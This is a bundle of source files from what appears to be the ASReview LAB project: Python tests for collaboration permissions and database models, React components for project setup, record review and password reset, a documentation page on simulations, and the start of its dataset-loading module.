len(getfullargspec(api_call).args)\n if number_of_params == 1:\n status_code, resp_data = api_call(client)\n elif number_of_params == 2:\n status_code, resp_data = api_call(client, project)\n elif number_of_params == 3:\n status_code, resp_data = api_call(client, project, user2)\n # all calls must return a 401:\n assert status_code == 401\n assert resp_data[\"message\"] == \"Login required.\"\n\n\n# ###################\n# TEST NO PERMISSION\n# ###################\n\n\n# Test user3 can't see invite from user 1 to user 2\ndef test_user3_cant_see_other_invites(setup_auth):\n client, _, user2, user3, project = setup_auth\n # invite to make sure we have an invitation (user1 is signed in)\n au.invite(client, project, user2)\n # signout user 1\n au.signout_user(client)\n # signin user 3 (not invited)\n 
au.signin_user(client, user3)\n # get all invitations\n status_code, resp_data = au.list_invitations(client)\n assert status_code == 200\n assert resp_data[\"invited_for_projects\"] == []\n\n\n# Test user3 can't accept invite to user 2\ndef test_user3_cant_reject_invite_of_user_2(setup_auth):\n client, _, user2, user3, project = setup_auth\n # invite to make sure we have an invitation (user1 is signed in)\n au.invite(client, project, user2)\n # signout user 1\n au.signout_user(client)\n # signin user 3 (not invited)\n au.signin_user(client, user3)\n status_code, resp_data = au.accept_invitation(client, project)\n assert status_code == 404\n assert resp_data[\"message\"] == \"Request can not made by current user.\"\n\n\n# Test user3 can't reject invite to user 2\ndef test_user3_cant_accept_invite_of_user_2(setup_auth):\n client, _, user2, user3, project = setup_auth\n # invite to make sure we have an invitation (user1 is signed in)\n au.invite(client, project, user2)\n # signout user 1\n au.signout_user(client)\n # signin user 3 (not invited)\n au.signin_user(client, user3)\n status_code, resp_data = au.reject_invitation(client, project)\n assert status_code == 404\n assert resp_data[\"message\"] == \"Request can not made by current user.\"\n\n\n# Test user3 can't delete invitation\ndef test_user3_cant_delete_invitation(setup_auth):\n client, _, user2, user3, project = setup_auth\n # invite\n au.invite(client, project, user2)\n # signout user 1\n au.signout_user(client)\n # signin user 3 (not invited)\n au.signin_user(client, user3)\n # remove invitation\n status_code, resp_data = au.delete_invitation(client, project, user2)\n assert status_code == 404\n assert resp_data[\"message\"] == \"Request can not made by current user.\"\n\n\n# Test user3 can't see collaboration team of user 1\ndef test_user3_cant_see_collaboration_team(setup_auth):\n client, _, user2, user3, project = setup_auth\n # invite\n au.invite(client, project, user2)\n # signout user 1\n au.signout_user(client)\n # signin user 3 (not invited)\n au.signin_user(client, user3)\n # check team\n status_code, resp_data = au.list_collaborators(client, project)\n assert status_code == 404\n assert resp_data[\"message\"] == \"Request can not made by current user.\"\n\n\n# Test user3 can't remove collaboration\ndef test_user3_cant_delete_collaboration(setup_auth):\n client, _, user2, user3, project = setup_auth\n # invite\n au.invite(client, project, user2)\n # signout user 1\n au.signout_user(client)\n # signin user 2\n au.signin_user(client, user2)\n # accept invitation and signs out\n au.accept_invitation(client, project)\n au.signout_user(client)\n # user 3 signs up\n au.signin_user(client, user3)\n # remove from team\n status_code, resp_data = au.delete_collaboration(client, project, user2)\n assert status_code == 404\n assert resp_data[\"message\"] == \"Request can not made by current user.\"\n" }, { "alpha_fraction": 0.5223262310028076, "alphanum_fraction": 0.5295282602310181, "avg_line_length": 30.378530502319336, "blob_id": "90a469ce35571e0aaff05cd353020f41c9fc1209", "content_id": "737fbdf70e2a2173baaed6ddbcbf4ce29942bd6c", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 5554, "license_type": "permissive", "max_line_length": 84, "num_lines": 177, "path": "/asreview/webapp/src/ProjectComponents/SetupComponents/FinishSetup.js", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "import * as React from \"react\";\nimport ReactLoading from 
\"react-loading\";\nimport { useMutation, useQueryClient } from \"react-query\";\nimport { connect } from \"react-redux\";\nimport { useNavigate } from \"react-router-dom\";\nimport YouTube from \"react-youtube\";\n\nimport { Button, Fade, Stack, Typography } from \"@mui/material\";\nimport { styled, useTheme } from \"@mui/material/styles\";\n\nimport { InlineErrorHandler } from \"../../Components\";\nimport { TypographySubtitle1Medium } from \"../../StyledComponents/StyledTypography\";\nimport { ProjectAPI } from \"../../api\";\nimport {\n mapStateToProps,\n mapDispatchToProps,\n projectModes,\n projectStatuses,\n} from \"../../globals.js\";\n\nlet width = window.screen.width;\n\nconst YouTubeVideoID = \"k-a2SCq-LtA\";\n\nconst PREFIX = \"FinishSetup\";\n\nconst classes = {\n root: `${PREFIX}-root`,\n};\n\nconst Root = styled(\"div\")(({ theme }) => ({\n display: \"flex\",\n [`& .${classes.root}`]: {\n alignItems: \"center\",\n },\n}));\n\nconst FinishSetup = (props) => {\n const navigate = useNavigate();\n const queryClient = useQueryClient();\n const theme = useTheme();\n\n const { error, isError, mutate } = useMutation(\n ProjectAPI.mutateProjectStatus,\n {\n onSuccess: () => {\n props.handleBack();\n queryClient.resetQueries(\"fetchProjectStatus\");\n },\n },\n );\n\n const onClickCloseSetup = async () => {\n props.toggleProjectSetup();\n console.log(\"Opening existing project \" + props.project_id);\n await queryClient.prefetchQuery(\n [\"fetchInfo\", { project_id: props.project_id }],\n ProjectAPI.fetchInfo,\n );\n if (props.mode !== projectModes.SIMULATION) {\n navigate(`/projects/${props.project_id}/review`);\n } else {\n navigate(`/projects/${props.project_id}`);\n }\n props.setProjectId(null);\n };\n\n const onClickClearError = () => {\n mutate({\n project_id: props.project_id,\n status: projectStatuses.SETUP,\n });\n };\n\n return (\n <Root>\n <Stack spacing={3}>\n {props.isStartTrainingError && (\n <InlineErrorHandler\n message={props.startTrainingError?.message}\n refetch={props.restartTraining}\n button={true}\n />\n )}\n {!props.isPreparingProject && props.isProjectReadyError && (\n <Stack className={classes.root} spacing={3}>\n <InlineErrorHandler message={props.projectReadyError?.message} />\n <Button onClick={onClickClearError}>Return to previous step</Button>\n </Stack>\n )}\n {isError && (\n <InlineErrorHandler\n message={error?.message}\n refetch={onClickClearError}\n button={true}\n />\n )}\n </Stack>\n <Stack spacing={3} className={classes.root}>\n {!props.isStartTrainingError && !props.isProjectReadyError && (\n <YouTube\n videoId={YouTubeVideoID}\n opts={{\n height: \"315\",\n width: width < 560 ? width - 48 : \"560\",\n playerVars: {\n rel: 0,\n },\n }}\n />\n )}\n {!props.isStartTrainingError &&\n !props.isProjectReadyError &&\n !props.trainingFinished && (\n <Stack className={classes.root} spacing={1}>\n <Stack className={classes.root}>\n <TypographySubtitle1Medium>\n Warming up the AI\n </TypographySubtitle1Medium>\n <Typography\n variant=\"body2\"\n sx={{\n color: \"text.secondary\",\n width: width < 560 ? \"90%\" : \"65%\",\n }}\n >\n ASReview LAB is extracting features from the text and training\n the classifier with selected prior knowledge. 
Learn more by\n watching the video.\n </Typography>\n </Stack>\n <ReactLoading\n type=\"bubbles\"\n color={theme.palette.primary.main}\n height={60}\n width={60}\n />\n </Stack>\n )}\n {props.trainingFinished && (\n <Stack spacing={3} className={classes.root}>\n {props.mode !== projectModes.SIMULATION && (\n <Fade in>\n <Stack spacing={3} className={classes.root}>\n <TypographySubtitle1Medium>\n AI is ready to assist you\n </TypographySubtitle1Medium>\n <Button onClick={onClickCloseSetup}>Start Reviewing</Button>\n </Stack>\n </Fade>\n )}\n {props.mode === projectModes.SIMULATION && (\n <Fade in>\n <Stack spacing={3} className={classes.root}>\n <Stack className={classes.root}>\n <TypographySubtitle1Medium>\n Your simulation project has been initiated\n </TypographySubtitle1Medium>\n <Typography\n variant=\"body2\"\n sx={{ color: \"text.secondary\" }}\n >\n It will take some time to complete the simulation\n </Typography>\n </Stack>\n <Button onClick={onClickCloseSetup}>Got it</Button>\n </Stack>\n </Fade>\n )}\n </Stack>\n )}\n </Stack>\n </Root>\n );\n};\n\nexport default connect(mapStateToProps, mapDispatchToProps)(FinishSetup);\n" }, { "alpha_fraction": 0.4591677486896515, "alphanum_fraction": 0.46384915709495544, "avg_line_length": 27.481481552124023, "blob_id": "89af239eeb76148881b2796454ed752c0cdc0382", "content_id": "7f7c6b51310be909f4c40b78c185da9147f39952", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 7690, "license_type": "permissive", "max_line_length": 83, "num_lines": 270, "path": "/asreview/webapp/src/ProjectComponents/ReviewComponents/RecordCard.js", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "import React from \"react\";\nimport clsx from \"clsx\";\nimport {\n Box,\n Button,\n Card,\n CardActions,\n CardContent,\n CircularProgress,\n Slide,\n Stack,\n Tooltip,\n Typography,\n} from \"@mui/material\";\nimport { styled } from \"@mui/material/styles\";\nimport { Link } from \"@mui/icons-material\";\n\nimport { BoxErrorHandler } from \"../../Components\";\nimport { DOIIcon } from \"../../icons\";\nimport { NoteSheet } from \"../ReviewComponents\";\nimport { ExplorationModeRecordAlert } from \"../../StyledComponents/StyledAlert.js\";\nimport { StyledIconButton } from \"../../StyledComponents/StyledButton.js\";\n\nconst PREFIX = \"RecordCard\";\n\nconst classes = {\n loadedCard: `${PREFIX}-loadedCard`,\n loadingCard: `${PREFIX}-loadingCard`,\n titleAbstract: `${PREFIX}-titleAbstract`,\n title: `${PREFIX}-title`,\n abstract: `${PREFIX}-abstract`,\n note: `${PREFIX}-note`,\n};\n\nconst Root = styled(\"div\")(({ theme }) => ({\n display: \"flex\",\n flex: \"1 0 auto\",\n margin: \"auto\",\n maxWidth: 960,\n padding: \"64px 0px 32px 0px\",\n height: \"100%\",\n [theme.breakpoints.down(\"md\")]: {\n padding: \"4px 0px\",\n },\n [`& .${classes.loadedCard}`]: {\n borderRadius: 16,\n display: \"flex\",\n flexDirection: \"column\",\n width: \"100%\",\n [theme.breakpoints.down(\"md\")]: {\n borderRadius: 0,\n },\n },\n\n [`& .${classes.loadingCard}`]: {\n justifyContent: \"center\",\n alignItems: \"center\",\n },\n\n [`& .${classes.titleAbstract}`]: {\n height: \"100%\",\n overflowY: \"scroll\",\n },\n\n [`& .${classes.title}`]: {\n lineHeight: 1.2,\n },\n\n [`& .${classes.abstract}`]: {\n whiteSpace: \"pre-line\",\n },\n\n [`& .${classes.note}`]: {\n justifyContent: \"flex-end\",\n },\n}));\n\nconst RecordCard = (props) => {\n const isDebugInclusion = () => {\n if (props.activeRecord) 
{\n return props.activeRecord._debug_label === 1;\n }\n };\n\n const expandNoteSheet = () => {\n props.setRecordNote((s) => {\n return {\n ...s,\n expand: true,\n shrink: false,\n };\n });\n };\n\n const shrinkNoteSheet = () => {\n props.setRecordNote((s) => {\n return {\n ...s,\n shrink: true,\n };\n });\n };\n\n return (\n <Root aria-label=\"record card\">\n {!props.isError && !props.activeRecord && (\n <Card\n elevation={2}\n className={clsx(classes.loadedCard, classes.loadingCard)}\n >\n <CardContent aria-label=\"record loading\">\n <CircularProgress />\n </CardContent>\n </Card>\n )}\n {props.isError && (\n <Card\n elevation={2}\n className={clsx(classes.loadedCard, classes.loadingCard)}\n aria-label=\"record loaded failure\"\n >\n <BoxErrorHandler queryKey=\"fetchRecord\" error={props.error} />\n </Card>\n )}\n {props.activeRecord && (\n <Card\n elevation={2}\n className={classes.loadedCard}\n aria-label=\"record loaded\"\n >\n {/* Previous decision alert */}\n {props.activeRecord._debug_label !== null && (\n <ExplorationModeRecordAlert\n label={!isDebugInclusion() ? \"irrelevant\" : \"relevant\"}\n />\n )}\n\n <CardContent\n className={`${classes.titleAbstract} record-card-content`}\n aria-label=\"record title abstract\"\n >\n <Stack spacing={1}>\n {/* Show the title */}\n <Typography\n component=\"div\"\n className={classes.title}\n variant={!props.mobileScreen ? \"h5\" : \"h6\"}\n sx={{\n fontWeight: (theme) => theme.typography.fontWeightRegular,\n }}\n >\n {/* No title, inplace text */}\n {(props.activeRecord.title === \"\" ||\n props.activeRecord.title === null) && (\n <Box\n className={\"fontSize\" + props.fontSize.label}\n fontStyle=\"italic\"\n >\n No title available\n </Box>\n )}\n\n {/* Show the title if available */}\n {!(\n props.activeRecord.title === \"\" ||\n props.activeRecord.title === null\n ) && (\n <Box className={\"fontSize\" + props.fontSize.label}>\n {props.activeRecord.title}\n </Box>\n )}\n </Typography>\n\n <Stack direction=\"row\" spacing={1}>\n {/* Show DOI if available */}\n {!(\n props.activeRecord.doi === undefined ||\n props.activeRecord.doi === null\n ) && (\n <StyledIconButton\n className=\"record-card-icon\"\n href={\"https://doi.org/\" + props.activeRecord.doi}\n target=\"_blank\"\n rel=\"noreferrer\"\n >\n <DOIIcon />\n </StyledIconButton>\n )}\n\n {/* Show URL if available */}\n {!(\n props.activeRecord.url === undefined ||\n props.activeRecord.url === null\n ) && (\n <Tooltip title=\"Open URL\">\n <StyledIconButton\n className=\"record-card-icon\"\n href={props.activeRecord.url}\n target=\"_blank\"\n rel=\"noreferrer\"\n >\n <Link />\n </StyledIconButton>\n </Tooltip>\n )}\n </Stack>\n {/* Show the abstract */}\n <Typography\n component=\"div\"\n className={\n classes.abstract + \" fontSize\" + props.fontSize.label\n }\n variant=\"body2\"\n paragraph\n sx={{ color: \"text.secondary\" }}\n >\n {/* No abstract, inplace text */}\n {(props.activeRecord.abstract === \"\" ||\n props.activeRecord.abstract === null) && (\n <Box fontStyle=\"italic\">No abstract available</Box>\n )}\n\n {/* Show the abstract if available */}\n {!(\n props.activeRecord.abstract === \"\" ||\n props.activeRecord.abstract === null\n ) && <Box>{props.activeRecord.abstract}</Box>}\n </Typography>\n </Stack>\n </CardContent>\n\n <Slide\n direction=\"up\"\n in={props.recordNote.expand}\n onExited={shrinkNoteSheet}\n mountOnEnter\n unmountOnExit\n >\n <Box>\n <NoteSheet\n note={props.recordNote.data}\n noteFieldAutoFocus={props.noteFieldAutoFocus}\n 
previousRecord={props.previousRecord}\n setRecordNote={props.setRecordNote}\n />\n </Box>\n </Slide>\n\n {props.recordNote.shrink && (\n <CardActions className={classes.note}>\n <Button\n disabled={props.disableButton()}\n size=\"small\"\n onClick={expandNoteSheet}\n aria-label=\"add note\"\n >\n {(props.previousRecord.show && props.previousRecord.note) ||\n props.recordNote.data\n ? \"Edit Note\"\n : \"Add Note\"}\n </Button>\n </CardActions>\n )}\n </Card>\n )}\n </Root>\n );\n};\n\nexport default RecordCard;\n" }, { "alpha_fraction": 0.6286248564720154, "alphanum_fraction": 0.6384471654891968, "avg_line_length": 34.63333511352539, "blob_id": "851cb589248bf8a26940492a4cf0a2e6a1d91c8d", "content_id": "ef6b27de3c05c33f1473ea3cea8cc3ceeacee08f", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4276, "license_type": "permissive", "max_line_length": 77, "num_lines": 120, "path": "/asreview/webapp/tests/test_database_and_models/test_collaboration_models.py", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "import pytest\nfrom sqlalchemy.exc import IntegrityError\n\nimport asreview.webapp.tests.utils.crud as crud\nfrom asreview.webapp import DB\nfrom asreview.webapp.authentication.models import Collaboration\nfrom asreview.webapp.authentication.models import CollaborationInvitation\n\n\nclass TestInvitations:\n \"\"\"Testing invitations on database level.\"\"\"\n\n # #############\n # CREATE\n # #############\n\n # test adding an invitation\n def test_adding_an_invitation(self, test_data):\n # get project\n project = test_data[\"user1\"].projects[0]\n # invite user 2\n project.pending_invitations.append(test_data[\"user2\"])\n DB.session.commit()\n\n assert crud.count_invitations() == 1\n # get fresh object\n invite = crud.last_invitation()\n # asserts Invitations\n assert invite.project_id == project.id\n assert invite.user_id == test_data[\"user2\"].id\n\n # test uniqueness of invitations\n def test_uniqueness_of_invitations(self, test_data):\n user1 = test_data[\"user1\"]\n user2 = test_data[\"user2\"]\n project = user1.projects[0]\n crud.create_invitation(DB, project, user2)\n assert crud.count_invitations() == 1\n\n # create identical invitation\n with pytest.raises(IntegrityError):\n crud.create_invitation(DB, project, user2)\n # if all is well, we can't add the same invitation\n assert crud.count_invitations() == 1\n\n # test missing user is not permitted\n def test_missing_user_in_invitation(self, test_data):\n project = test_data[\"user1\"].projects[0]\n invite = CollaborationInvitation(project_id=project.id, user_id=None)\n DB.session.add(invite)\n with pytest.raises(IntegrityError):\n DB.session.commit()\n DB.session.rollback()\n assert crud.count_invitations() == 0\n\n # test missing project is not permitted\n def test_missing_project_in_invitation(self, test_data):\n user = test_data[\"user1\"]\n invite = CollaborationInvitation(project_id=None, user_id=user.id)\n DB.session.add(invite)\n with pytest.raises(IntegrityError):\n DB.session.commit()\n DB.session.rollback()\n assert crud.count_invitations() == 0\n\n\nclass TestCollaborations:\n \"\"\"Testing collaboration on database level.\"\"\"\n\n # #############\n # CREATE\n # #############\n\n # test adding a collaboration\n def test_create_collaboration(self, test_data):\n # get project\n project = test_data[\"user1\"].projects[0]\n # collaboration user 2\n project.collaborators.append(test_data[\"user2\"])\n DB.session.commit()\n assert 
crud.count_collaborations() == 1\n # get fresh objects\n collab = crud.last_collaboration()\n # asserts collaboration\n assert collab.project_id == project.id\n assert collab.user_id == test_data[\"user2\"].id\n\n # test uniqueness of collaboration\n def test_uniqueness_of_collaboration(self, test_data):\n user1 = test_data[\"user1\"]\n user2 = test_data[\"user2\"]\n project = user1.projects[0]\n crud.create_collaboration(DB, project, user2)\n assert crud.count_collaborations() == 1\n\n # create identical collaboration\n with pytest.raises(IntegrityError):\n crud.create_collaboration(DB, project, user2)\n # if all is well, we can't add the same collaboration\n assert crud.count_collaborations() == 1\n\n # test missing user is not permitted\n def test_missing_user_in_collaboration(self, test_data):\n project = test_data[\"user1\"].projects[0]\n invite = Collaboration(project_id=project.id, user_id=None)\n DB.session.add(invite)\n with pytest.raises(IntegrityError):\n DB.session.commit()\n DB.session.rollback()\n assert crud.count_collaborations() == 0\n\n # test missing project is not permitted\n def test_missing_project_in_collaboration(self, test_data):\n user = test_data[\"user1\"]\n invite = Collaboration(project_id=None, user_id=user.id)\n DB.session.add(invite)\n with pytest.raises(IntegrityError):\n DB.session.commit()\n DB.session.rollback()\n assert crud.count_collaborations() == 0\n" }, { "alpha_fraction": 0.7591947317123413, "alphanum_fraction": 0.7615557909011841, "avg_line_length": 49.67307662963867, "blob_id": "39b6cb2e145bca7e65612793aebf8247e1609b96", "content_id": "23641648f1d7a799193e9c20965b2f3fe17abde0", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 2583, "license_type": "permissive", "max_line_length": 493, "num_lines": 52, "path": "/docs/source/simulation_overview.rst", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "Overview\n========\n\nASReview LAB offers three different solutions to run simulations:\n\n- :ref:`Webapp (the frontend) <simulation_webapp:simulate via the webapp>`\n- :doc:`Command line interface <simulation_cli>`\n- :doc:`Python API <simulation_api_example>`\n\n\nWhat is a simulation?\n---------------------\n\nA simulation involves mimicking the screening process with a certain model. As\nit is already known which records are labeled as relevant, the software can\nautomatically reenact the screening process as if a human were labeling the\nrecords in interaction with the Active Learning model.\n\nWhy run a simulation?\n---------------------\n\nSimulating with ASReview LAB has multiple purposes. First, the performance of\none or multiple models can be measured by different metrics (see :ref:`Analyzing results <simulation_results:Analyzing results>`). A convenient metric\nis the amount of work you could have saved by using\nactive learning compared to your manual screening process.\n\nSuppose you don't know which model to choose for a new (unlabeled) dataset. In\nthat case, you can experiment with the best performing combination of\nclassifier, feature extraction, query strategy, and balancing, and test the\nperformance on a labeled dataset with similar characteristics.\n\nYou could also use the simulation mode to benchmark your own model against\nexisting models for different available datasets. ASReview LAB allows for adding\nnew models `via a template\n<https://github.com/asreview/template-extension-new-model>`_.\n\nYou can also find 'odd' relevant records in a 'classical' search. Such records\nare typically found isolated from most other records and might be worth closer\ninspection.\n\nDatasets for simulation\n-----------------------\n\nSimulations require :ref:`fully labeled datasets <data_labeled:fully labeled data>` (labels: ``0`` = irrelevant, ``1`` = relevant). Such a dataset can be the result of an earlier study. ASReview also offers fully labeled datasets via the `benchmark platform <https://github.com/asreview/systematic-review-datasets>`_. These datasets are available via the user interface in the *Data* step of the setup and in the command line with the prefix `benchmark:` (e.g. `benchmark:van_de_schoot_2017`).
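\n\nFor example, a simulation with one of these benchmark datasets can be started from the command line. The following is only a minimal sketch (the name of the output state file is an arbitrary example); all available options are described in the :doc:`command line interface <simulation_cli>` documentation::\n\n asreview simulate benchmark:van_de_schoot_2017 --state_file myreview.asreview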
ASReview LAB allows for adding\nnew models `via a template\n<https://github.com/asreview/template-extension-new-model>`_.\n\nYou can also find 'odd' relevant records in a 'classical' search. Such records\nare typically found isolated from most other records and might be worth closer\ninspection\n\nDatasets for simulation\n-----------------------\n\nSimulations require :ref:`fully labeled datasets <data_labeled:fully labeled data>` (labels: ``0`` = irrelevant, ``1`` = relevant). Such a dataset can be the result of an earlier study. ASReview offers also fully labeled datasets via the `benchmark platform <https://github.com/asreview/systematic-review-datasets>`_. These datasets are available via the user interface in the *Data* step of the setup and in the command line with the prefix `benchmark:` (e.g. `benchmark:van_de_schoot_2017`).\n\n.. tip::\n\n When you import your data, make sure to remove duplicates and to retrieve\n as many abstracts as possible (`See Importance-of-abstracts blog for help\n <https://asreview.ai/blog/the-importance-of-abstracts/>`_). With clean data you\n benefit most from what :doc:`active learning <about>`\n has to offer.\n" }, { "alpha_fraction": 0.47977980971336365, "alphanum_fraction": 0.4852847754955292, "avg_line_length": 26.782352447509766, "blob_id": "faee923bef336e0c72deb80516cc86d9d02a8d43", "content_id": "23420387b62930ecda615acd75e031377f7afc00", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 4723, "license_type": "permissive", "max_line_length": 79, "num_lines": 170, "path": "/asreview/webapp/src/Components/ForgotPassword.js", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "import * as React from \"react\";\nimport { useSelector } from \"react-redux\";\nimport { useNavigate } from \"react-router-dom\";\nimport { useMutation, useQueryClient } from \"react-query\";\nimport {\n Box,\n Button,\n Card,\n CardContent,\n Fade,\n Stack,\n TextField,\n Typography,\n} from \"@mui/material\";\nimport LoadingButton from \"@mui/lab/LoadingButton\";\nimport { styled } from \"@mui/material/styles\";\n\nimport { WordmarkState } from \"../globals\";\nimport { InlineErrorHandler } from \".\";\nimport AuthAPI from \"../api/AuthAPI\";\n\nconst PREFIX = \"SignInForm\";\n\nconst classes = {\n button: `${PREFIX}-button`,\n card: `${PREFIX}-card`,\n cardContent: `${PREFIX}-card-content`,\n checkbox: `${PREFIX}-checkbox`,\n header: `${PREFIX}-header`,\n logo: `${PREFIX}-logo`,\n};\n\nconst Root = styled(\"div\")(({ theme }) => ({\n display: \"flex\",\n height: \"100%\",\n width: \"100%\",\n alignItems: \"center\",\n justifyContent: \"center\",\n position: \"absolute\",\n [`& .${classes.button}`]: {\n paddingTop: theme.spacing(3),\n paddingBottom: theme.spacing(3),\n justifyContent: \"space-between\",\n },\n\n [`& .${classes.card}`]: {\n borderRadius: theme.spacing(2),\n width: \"450px\",\n },\n\n [`& .${classes.cardContent}`]: {\n padding: \"48px 40px\",\n },\n\n [`& .${classes.header}`]: {\n alignItems: \"center\",\n },\n\n [`& .${classes.logo}`]: {\n width: \"100%\",\n maxWidth: \"130px\",\n },\n}));\n\nconst ForgotPassword = () => {\n const emailConfig = useSelector((state) => state.email_config) || false;\n const [email, setEmail] = React.useState(\"\");\n const [successMessage, setSuccessMessage] = React.useState(false);\n const queryClient = useQueryClient();\n const navigate = useNavigate();\n\n const { error, isError, isLoading, mutate, reset } = useMutation(\n 
AuthAPI.forgotPassword,\n {\n onMutate: () => {\n // clear potential error\n queryClient.resetQueries(\"refresh\");\n },\n onSuccess: (data) => {\n setEmail(\"\");\n setSuccessMessage(data.message);\n },\n onError: (data) => {\n console.error(\"Forgot password error\", data);\n },\n },\n );\n\n const handleSubmit = (event) => {\n event.preventDefault();\n reset();\n mutate({ email });\n };\n\n const handleEmailChange = (event) => {\n setEmail(event.target.value);\n };\n\n const handleSignin = (event) => {\n navigate(\"/signin\");\n };\n\n return (\n <Root>\n <Fade in>\n <Box>\n <Card className={classes.card} variant=\"outlined\">\n <CardContent className={classes.cardContent}>\n <Stack spacing={3}>\n <Stack className={classes.header} spacing={2}>\n <img\n className={classes.logo}\n src={WordmarkState()}\n alt=\"ASReview LAB\"\n />\n <Typography variant=\"h5\">Forgot your password?</Typography>\n {emailConfig && (\n <p>\n Enter your email address, click on the submit button and\n an email will be sent to you. Check your spam or bulk\n folder if you don't get an email.\n </p>\n )}\n {!emailConfig && (\n <p>Contact your ASReview-app administrator</p>\n )}\n </Stack>\n {emailConfig && (\n <>\n <Stack spacing={3}>\n <TextField\n label=\"Email\"\n value={email}\n onChange={handleEmailChange}\n variant=\"outlined\"\n fullWidth\n autoFocus\n />\n </Stack>\n {isError && <InlineErrorHandler message={error.message} />}\n {successMessage && <p>{successMessage}</p>}\n\n <Stack className={classes.button} direction=\"row\">\n <LoadingButton\n loading={isLoading}\n variant=\"contained\"\n color=\"primary\"\n onClick={handleSubmit}\n >\n Submit\n </LoadingButton>\n <Button\n onClick={handleSignin}\n sx={{ textTransform: \"none\" }}\n >\n Sign In instead\n </Button>\n </Stack>\n </>\n )}\n </Stack>\n </CardContent>\n </Card>\n </Box>\n </Fade>\n </Root>\n );\n};\n\nexport default ForgotPassword;\n" }, { "alpha_fraction": 0.49306225776672363, "alphanum_fraction": 0.5245586037635803, "avg_line_length": 36.33022689819336, "blob_id": "18fcd9b444c7e83266c3791be4cd069d2fa4bc4a", "content_id": "25c25ac0bd234cefdd68b026d3c027ff0d6e99a9", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 28055, "license_type": "permissive", "max_line_length": 120, "num_lines": 751, "path": "/asreview/datasets.py", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "# Copyright 2019-2022 The ASReview Authors. 
All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport json\nimport socket\nimport tempfile\nfrom abc import ABC\nfrom abc import abstractmethod\nfrom pathlib import Path\nfrom urllib.error import URLError\nfrom urllib.request import urlopen\nfrom urllib.request import urlretrieve\n\nimport synergy_dataset as sd\n\nfrom asreview.io import CSVReader\nfrom asreview.utils import _entry_points\nfrom asreview.utils import _get_filename_from_url\nfrom asreview.utils import is_iterable\n\n\nclass DatasetNotFoundError(Exception):\n    pass\n\n\ndef _download_from_metadata(url):\n    \"\"\"Download metadata to dataset.\"\"\"\n\n    try:\n        with urlopen(url, timeout=10) as f:\n            meta_data = json.loads(f.read().decode())\n    except URLError as e:\n        if isinstance(e.reason, socket.timeout):\n            raise Exception(\"Connection time out.\")\n        raise e\n\n    datasets = []\n    for data in meta_data.values():\n        # raise error on versioned datasets\n        if \"type\" in data and data[\"type\"] == \"versioned\":\n            raise ValueError(\"Datasets of type 'versioned' are deprecated\")\n\n        datasets.append(BaseDataSet(**data))\n\n    return datasets\n\n\nclass BaseDataSet:\n    def __init__(\n        self,\n        dataset_id,\n        filepath=None,\n        title=None,\n        description=None,\n        authors=None,\n        topic=None,\n        link=None,\n        reference=None,\n        img_url=None,\n        license=None,\n        year=None,\n        aliases=[],\n        **kwargs,\n    ):\n        \"\"\"Base class for metadata of dataset.\n\n        A BaseDataSet is a class with metadata about a (labeled)\n        dataset used in ASReview LAB. The dataset can be used via\n        the frontend or via command line interface.\n\n        In general, a BaseDataSet is part of a group (BaseDataGroup).\n\n        Examples\n        --------\n\n        The following example simulates a dataset with dataset_id\n        'cord_19'. The name of the group is 'covid'.\n\n        >>> asreview simulate covid:cord_19\n\n        Parameters\n        ----------\n        dataset_id: str\n            Identifier of the dataset. The value is an alphanumeric\n            string used to identify the dataset via the command line\n            interface. Example: 'groupname:DATASET_ID' where DATASET_ID\n            is the value of dataset_id.\n        filepath: str\n            Path to file or URL to the dataset. See\n            asreview.readthedocs.io/{URL} for information about valid\n            datasets.\n        title: str\n            Title of the dataset.\n        description: str\n            Description of the dataset. Optional.\n        authors: list\n            Authors of the dataset. Optional.\n        topic: str\n            Topic of the dataset. Optional.\n        link: str\n            Link to a website or additional information.\n        reference: str\n            (Academic) reference describing the dataset. Optional.\n        license: str\n            License of the dataset. Optional.\n        year: str\n            Year of publication of the dataset. Optional.\n        img_url: str\n            Image for display in graphical interfaces. Optional.\n        aliases: list\n            Additional identifiers for the dataset_id. This can be\n            useful for long or complex dataset_id's.
Optional.\n\n        \"\"\"\n\n        self.dataset_id = dataset_id\n        self.filepath = filepath\n        self.title = title\n        self.description = description\n        self.authors = authors\n        self.topic = topic\n        self.link = link\n        self.reference = reference\n        self.license = license\n        self.year = year\n        self.img_url = img_url\n        self.aliases = aliases\n        self.kwargs = kwargs\n\n    def __str__(self):\n        return f\"<BaseDataSet dataset_id='{self.dataset_id}' title='{self.title}'>\"\n\n    def __dict__(self):\n        return {\n            \"dataset_id\": self.dataset_id,\n            \"filepath\": self.filepath,\n            \"title\": self.title,\n            \"description\": self.description,\n            \"authors\": self.authors,\n            \"topic\": self.topic,\n            \"link\": self.link,\n            \"reference\": self.reference,\n            \"license\": self.license,\n            \"year\": self.year,\n            \"img_url\": self.img_url,\n            \"aliases\": self.aliases,\n            **self.kwargs,\n        }\n\n    @property\n    def reader(self):\n        return None\n\n    @property\n    def filename(self):\n        if not hasattr(self, \"_filename\"):\n            self._filename = _get_filename_from_url(self.filepath)\n\n        return self._filename\n\n    def to_file(self, path):\n        # TODO: return the data without storing it to disk\n        urlretrieve(self.filepath, path)\n\n\nclass 